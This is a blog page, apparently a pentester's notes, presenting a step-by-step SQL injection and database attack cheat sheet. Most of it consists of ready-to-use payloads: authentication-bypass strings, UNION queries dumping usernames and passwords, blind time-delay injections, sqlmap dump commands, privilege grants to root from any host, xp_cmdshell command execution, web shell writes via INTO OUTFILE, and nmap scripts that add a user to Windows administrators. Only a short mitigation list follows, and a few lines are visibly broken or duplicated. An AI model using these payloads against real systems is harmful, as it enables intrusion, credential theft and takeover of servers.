Skip to main content

SQLDB Pentest

Pivoting for Red Teamers

SQL Database & SQL Injection Pentesting Cheat Sheet

SQL databases store crucial application data, and misconfigurations can make them vulnerable to SQL Injection (SQLi) attacks. This guide covers database enumeration, privilege escalation, and SQL injection techniques.

Step 1: Identifying SQL Database Type

Check the database type by sending payloads in the input fields or URL:

' OR 1=1 --     (MySQL, PostgreSQL, MSSQL)
' UNION SELECT 1,2,3 -- (Check column count)
' AND 1=CONVERT(int,@@version) -- (MSSQL Test)

Observe the error messages for database identification.

Step 2: Enumerating Database Tables & Columns

Use SQL queries to extract database structure.

For MySQL:

SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE();
SELECT column_name FROM information_schema.columns WHERE table_name='users';

For MSSQL:

SELECT name FROM sysobjects WHERE xtype='U';  -- List Tables
SELECT name FROM syscolumns WHERE id=OBJECT_ID('users');  -- List Columns

Step 3: Extracting Data (SQL Injection Exploitation)

Inject SQL payloads into vulnerable parameters to retrieve data.

' UNION SELECT username,password FROM users --

Using subqueries to avoid detection:

' UNION SELECT (SELECT group_concat(username, ':', password) FROM users) --

Step 4: Bypassing Authentication via SQL Injection

Common authentication bypass payloads:

' OR '1'='1' -- 
' OR '1'='1'#
admin' --

If the login form is vulnerable, attackers can gain access to admin accounts.

Step 5: Privilege Escalation via SQL Injection

If you can execute SQL commands, escalate privileges:

For MySQL:

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'newpassword';

For MSSQL (if xp_cmdshell is enabled):

EXEC xp_cmdshell 'whoami';  -- Execute system commands

Step 6: Extracting Hashes from the Database

Retrieve password hashes for cracking:

For MySQL:

SELECT user, host, password FROM mysql.user;

For MSSQL:

SELECT name, password_hash FROM sys.sql_logins;

Step 7: Blind SQL Injection

When errors are not displayed, use time-based blind SQL injection:

' OR IF(1=1, SLEEP(5), 0) -- (MySQL)
' OR WAITFOR DELAY '0:0:5' -- (MSSQL)

Step 8: Using SQLMap for Automated SQL Injection

SQLMap automates SQL injection testing:

sqlmap -u "http://example.com/page.php?id=1" --dbs
sqlmap -u "http://example.com/page.php?id=1" --dump-all

Step 9: Extracting Files via SQL Injection

Retrieve server files using SQL queries.

For MySQL (OUTFILE method):

SELECT "" INTO OUTFILE '/var/www/html/shell.php';

For MSSQL (Bulk Insert):

BULK INSERT mytable FROM 'C:\inetpub\wwwroot\web.config';

Step 10: Web Shell Upload via SQL Injection

If file writing is enabled, upload a web shell:

SELECT "" INTO OUTFILE '/var/www/html/backdoor.php';

SQL enum with nmap

If file writing is enabled, upload a web shell:

nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS
nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user abc abc /add" 
nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net localgroup administrators user /add"
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 
nmap --script mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse -p3306 -sV 10.10.10.1

Mitigation Recommendations

  • Use prepared statements to prevent SQL injection.
  • Restrict database permissions to avoid privilege escalation.
  • Use Web Application Firewalls (WAF) to block malicious queries.
  • Sanitize user input and avoid dynamic SQL queries.
  • Regularly update and patch database management systems.

References

  • MSSQL Injection Cheat Sheet | pentestmonkey

    • Conclusion

    SQL injection remains one of the most critical security vulnerabilities. Proper security testing, patching, and mitigation techniques can help protect databases from exploitation.

Comments

Post a Comment

Popular posts from this blog

Powershell Automation Basics - Part 1

Pentest Notes: PowerShell Automation - Basics Pentest Notes: PowerShell Automation - Basics These notes cover PowerShell automation for penetration testing, focusing on practical applications and techniques. What is PowerShell? A powerful scripting language and command-line shell built on the .NET framework, heavily integrated with Windows. Ideal for system administration and automation, making it a valuable tool for pentesters. Why PowerShell for Pentesting? Native to Windows: Pre-installed on most Windows systems. Object-oriented: Allows for complex data manipulation and interaction with APIs. Access to .NET Framework: Enables interaction with a vast library of classes and functions. Remoting capabilities: Execute commands on remote systems. Bypass security restrictions: Can be used to circumvent some security measures if not properly configured. Basic Syntax Cmdlets: Commands in PowerShell (e.g., Get-Process , Get-Service , Get-ChildItem ). P...
Post a Comment
Read more

DAMN BASH

Bash Scripting: From Basic to Advanced Bash Scripting: From Basic to Advanced Bash (Bourne Again SHell) is a powerful command-line interpreter and scripting language commonly used in Linux and macOS environments. This post covers Bash scripting from basic commands to more advanced techniques. I. Basic Commands These commands are the building blocks of Bash scripting: Command Description ls Lists files and directories. cd Changes the current directory. pwd Prints the current working directory. mkdir Creates a new directory. rm Removes files or directories (use with caution!). cp Copies files or directories. mv Moves or renames files or directories. cat Displays file content. echo Prints text to the console. II. Variables Variables store data that can be used in your scripts: name="John Doe" echo "Hello, $name!" age=30 echo $((age + 5)) # Arithmetic operations III. Input/Output Redirection Redirect input an...
Post a Comment
Read more